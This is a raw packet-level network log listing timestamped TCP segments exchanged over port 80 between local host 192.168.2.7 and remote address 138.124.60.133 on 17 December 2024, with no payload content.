Dec 17, 2024 08:21:47.089432001 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.090250015 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.090310097 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.090317965 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.090373039 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.091212034 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.091291904 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.091346979 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.091402054 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.092222929 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.092283010 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.092356920 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.092411995 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.093286037 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.093342066 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.093341112 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.093398094 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.094191074 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.094249010 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.094316959 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.094373941 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.095200062 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.095264912 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.095293045 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.095347881 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.096164942 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.096257925 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.096277952 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.096330881 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.097234964 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.097295046 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.097347021 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.097404003 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.153781891 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.153862000 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.153865099 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.153914928 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.153995991 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.154048920 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.154172897 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.154228926 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.154309988 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.154367924 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.155203104 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.155260086 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.155373096 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.155431986 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.156135082 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.156207085 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.241564989 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.241610050 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.241682053 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.241779089 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.241897106 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.241898060 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.241898060 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.241898060 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.242613077 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.242680073 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.242716074 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.242770910 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.243526936 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.243590117 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.243640900 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.243697882 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.244450092 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.244510889 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.244589090 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.244652033 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.245392084 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.245450974 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.245580912 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.245636940 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.246298075 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.246359110 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.246433020 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.246488094 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.247266054 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.247327089 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.247375965 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.247431993 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.248214006 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.248275995 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.248312950 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.248363018 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.249119997 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.249178886 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.249213934 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.249270916 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.250047922 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.250097990 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.250144958 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.250205040 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.250961065 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.251013994 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.251055956 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.251107931 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.251976967 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.252033949 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.252324104 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.252379894 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.252857924 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.252911091 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.252912045 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.252966881 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.253727913 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.253786087 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.253873110 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.253926992 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.254694939 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.254750967 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.254810095 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.254884958 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.256191969 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.256251097 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.256361961 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.256417036 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.257186890 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.257240057 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.257244110 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.257304907 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.257833004 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.257894993 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.257921934 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.257980108 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.258652925 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.258708000 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.258713007 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.258763075 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.259291887 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.259360075 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.259413958 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.259473085 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.260236979 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.260304928 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.260359049 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.260416031 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.261152983 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.261209011 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.261284113 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.261343002 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.262069941 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.262129068 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.262202024 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.262257099 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.263015985 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.263075113 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.263134956 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.263190031 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.263940096 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.263999939 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.264059067 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.264113903 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.264859915 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.264919043 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.265100002 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.265156031 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.265819073 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.265877962 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.265955925 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.266011953 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.266726017 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.266787052 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.266861916 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.266916990 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.267672062 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.267728090 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.267791986 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.267846107 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.268627882 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.268686056 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.268698931 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.268754005 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.269588947 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.269646883 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.269716024 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.269804001 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.270443916 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.270503044 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.270570040 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.270623922 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.271378994 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.271444082 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.271509886 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.271567106 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.272371054 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.272423983 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.272430897 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.272476912 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.273233891 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.273293972 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.273387909 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.273443937 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.274174929 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.274233103 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.274307013 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.274363041 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.275085926 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.275145054 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.275219917 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.275276899 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.276081085 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.276146889 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.276195049 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.276249886 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.276997089 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.277050018 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.277059078 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.277108908 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.277884007 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.277945995 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.278045893 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.278104067 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.278799057 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.278858900 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.278923988 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.278980970 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.279732943 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.279793024 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.279867887 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.279925108 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.281016111 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.281075954 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.281148911 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.281205893 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.281601906 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.281662941 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.281697989 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.281754017 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.282509089 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.282571077 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.282654047 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.282711983 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.283488035 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.283549070 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.283581972 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.283638000 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.284476042 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.284533978 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.284533978 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.284590006 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.285335064 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.285387993 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.285393000 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.285444021 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.286705017 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.286760092 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.286780119 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.286813021 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.287198067 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.287256002 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.345923901 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.346008062 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.346024036 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.346103907 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.346249104 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.346303940 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.346391916 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.346448898 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.347142935 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.347201109 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.347276926 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.347352028 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.348073959 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.348145962 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.433794022 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.433835030 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.433881044 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.433881044 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.434101105 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.434170008 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.434413910 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.434478045 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.434552908 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.434606075 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.435168028 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.435221910 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.435295105 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.435350895 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.436106920 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.436166048 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.436194897 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.436248064 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.436994076 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.437057972 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.437125921 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.437184095 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.437998056 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.438050032 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.438051939 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.438102007 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.438826084 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.438879013 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.438965082 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.439019918 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.439735889 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.439789057 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.439872026 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.439924002 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.440612078 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.440668106 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.440737009 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.440814972 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.441551924 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.441612005 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.441647053 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.441703081 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.442471981 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.442528963 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.442598104 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.442651987 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.443409920 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.443476915 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.443506956 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.443558931 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.444401979 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.444454908 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.444470882 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.444511890 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.445225000 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.445290089 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.445362091 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.445461988 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.446147919 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.446201086 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.446211100 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.446253061 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.446975946 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.447040081 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.447154999 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.447211027 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.447896004 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.447959900 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.448016882 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.448071003 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.448803902 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.448874950 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.448930979 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.448985100 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.449693918 CET	80	49762	138.124.60.133	192.168.2.7
